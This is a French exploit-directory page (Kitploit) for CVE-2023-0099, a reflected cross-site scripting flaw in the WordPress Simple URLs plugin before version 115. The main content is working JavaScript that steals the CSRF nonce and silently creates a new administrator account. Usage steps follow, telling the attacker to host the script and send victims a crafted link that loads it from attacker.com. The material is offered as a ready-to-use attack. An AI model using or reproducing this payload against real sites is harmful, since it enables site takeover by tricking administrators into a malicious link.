Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-0099-exploit — URLs simples < 115 - XSS réfléchi | Kitploit
Outils/GitHubGitHub/amirzargham/cve-2023-0099-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

URLs simples < 115 - XSS réfléchi

Voir le dépôt
6121il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-0099-exploit

Titre de l'exploit : simple urls < 115 - XSS Réfléchi

Google Dork :

Auteur de l'exploit : AmirZargham

Page d'accueil du vendeur : https://getlasso.co/

Lien du logiciel : https://wordpress.org/plugins/simple-urls/

Version : < 115

Testé sur : firefox, chrome

CVE : CVE-2023-0099

CWE : CWE-79

Plateforme : MULTIPLE

Type : Applications Web

Description Le plugin WordPress Simple URLs avant la version 115 ne nettoie ni n'échappe certains paramètres avant de les afficher dans certaines pages, ce qui entraîne un Cross-Site Scripting Réfléchi pouvant être utilisé contre des utilisateurs à privilèges élevés, tels que les administrateurs.

Exploit :

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

Informations d'utilisation :

  1. enregistrer le code de l'exploit sur le serveur en tant que fichier javascript.
  2. dans le fichier de l'exploit, modifier les valeurs :
    • user_login : nom d'utilisateur arbitraire
    • pass1 : mot de passe arbitraire
    • pass2 : mot de passe arbitraire
    • email : email arbitraire
  3. envoyer maintenant le lien malveillant à la victime : https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. sachant qu'un compte administrateur a été créé, allez sur /wp-admin ou autre, et connectez-vous au panneau WordPress.

Publié dans : exploit-db.

Publié dans : 0day.today.

Publié dans : packet storm.

Télécharger l’outil